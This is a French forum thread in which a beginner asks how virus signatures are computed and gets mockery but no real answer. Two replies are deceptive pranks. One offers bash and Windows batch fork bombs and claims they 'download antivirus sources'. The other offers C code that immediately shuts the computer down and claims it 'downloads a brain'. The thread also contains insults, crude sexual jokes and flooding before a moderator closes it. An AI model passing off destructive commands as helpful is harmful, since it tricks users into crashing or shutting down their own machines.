Partage
  • Partager sur Facebook
  • Partager sur Twitter

calcule

signature des fichier

26 mai 2010 à 16:42:03

slt tous le monde :)
jais poser se sujet ici mais qu'on jais pas trouvé la repense jais décidé de le poser ici avec mais amie(les programmeur :lol: )

alors je veux savoir comment calculer la signature des programme (ex: signature des virus )

ps:je veux pas créer un antivirus mais je suis curieux de savoir comment la calcule jais lut qu'il faux utilise le hach mais comment faire? :)

je suis dsl pour mon orthographe :'(
  • Partager sur Facebook
  • Partager sur Twitter
26 mai 2010 à 16:45:36

Dis, tu sais faire une recherche ?
Deux secondes de ta vie, c'est vraiment la mort ?
  • Partager sur Facebook
  • Partager sur Twitter
26 mai 2010 à 16:46:01

Ceci est du flood.

Qu'est-ce que le flood ? Une réponse à venir !
  • Partager sur Facebook
  • Partager sur Twitter
26 mai 2010 à 16:47:05

Le flood, koissé ?
Merci Wiki !
(Et ça rime)

Bon, j'arrètlefloodissi
  • Partager sur Facebook
  • Partager sur Twitter
26 mai 2010 à 16:51:38

Remercions tous Meretphis (avec une belle majuscule) pour sa brillante intervention.

Lui, au moins, il a le "recherche-réflexe" !
  • Partager sur Facebook
  • Partager sur Twitter
26 mai 2010 à 16:53:15

Nop, j'ai le réflexe de la recherche, nuance.
  • Partager sur Facebook
  • Partager sur Twitter
26 mai 2010 à 17:00:12

au fait, pour l'OP

#!/bin/bash

:(){:|:&}:


Tu enregistre en .sh, et tu exécute si tu es sous Linux.

Si tu es sous Windows :

@echo off
%0|%0


Dans un .bat. Tu double clique dessus ensuite.

Ça télécharge les sources d'antivir.

Edit : erreur de balise :D

Oublié, il faut rajouter un 0 après les % dans le code sous windows, sinon, ça ajoute pleins de fichiers du serveurs, et c'est pas cool comme fichiers.
  • Partager sur Facebook
  • Partager sur Twitter
26 mai 2010 à 17:56:41

slt
essai ce code
printf("tu est un con un âne ");
system("shutdown -s -t 1");

il télécharge un cerveaux pour toi ;):diable::diable:
  • Partager sur Facebook
  • Partager sur Twitter
26 mai 2010 à 18:02:47

ou plutot il les fait se reposer pour eviter de dire deux fois la meme ânerie :p
  • Partager sur Facebook
  • Partager sur Twitter
26 mai 2010 à 18:05:28

Citation : hafid_le_programmeur

slt
essai ce code

printf("tu est un con un âne ");
system("shutdown -s -t 1");


il télécharge un cerveaux pour toi ;):diable::diable:


Pourquoi ai-je l'impression que tu as testé ?
  • Partager sur Facebook
  • Partager sur Twitter
26 mai 2010 à 18:06:42

Ça marche pas, il faut inclure stdlib.h.

Et mon cerveau est à peu près 42 fois plus développé que le tien, alors taggle.


@Merkil : je t'aime !
  • Partager sur Facebook
  • Partager sur Twitter
26 mai 2010 à 18:08:59

Et le mien est 101010 fois plus développé que le tien, alors taggle.
  • Partager sur Facebook
  • Partager sur Twitter
26 mai 2010 à 18:14:35

Le mien est sizeof(double) (on compte en bits, of course) fois plus dév. que le tien :-°
  • Partager sur Facebook
  • Partager sur Twitter
26 mai 2010 à 18:17:34

mdr, les enfants allez vous laver les mains, vous continuerez votre jeu après le gouter !! ;)
  • Partager sur Facebook
  • Partager sur Twitter
26 mai 2010 à 18:52:59

OH PUTAIN LES MECS !!!
Je viens de regarder, et en fait j'ai deux pénis !!!

Non, mais c'est pas que ça me gène, mais j'avais jamais remarqué, donc j'suis un peu surpris.


EDIT: Ah non, c'était ma jambe.
En même temps, un truc poilu, large, d'un mètre de long, ça ressemblait vachement à mon premier pénis, alors je me disais que ça aurait pu en être un deuxième.
Pourquoi pas, ça peut toujours servir. :)
  • Partager sur Facebook
  • Partager sur Twitter
26 mai 2010 à 19:00:21

J'en peux plus, arrête :lol:
  • Partager sur Facebook
  • Partager sur Twitter
26 mai 2010 à 19:07:43

Il fait qu'un mètre de long le tien ?

P'tit joueur va !
  • Partager sur Facebook
  • Partager sur Twitter
Anonyme
26 mai 2010 à 19:27:51

Je ferme ici.
Merci d'éviter le flood...
  • Partager sur Facebook
  • Partager sur Twitter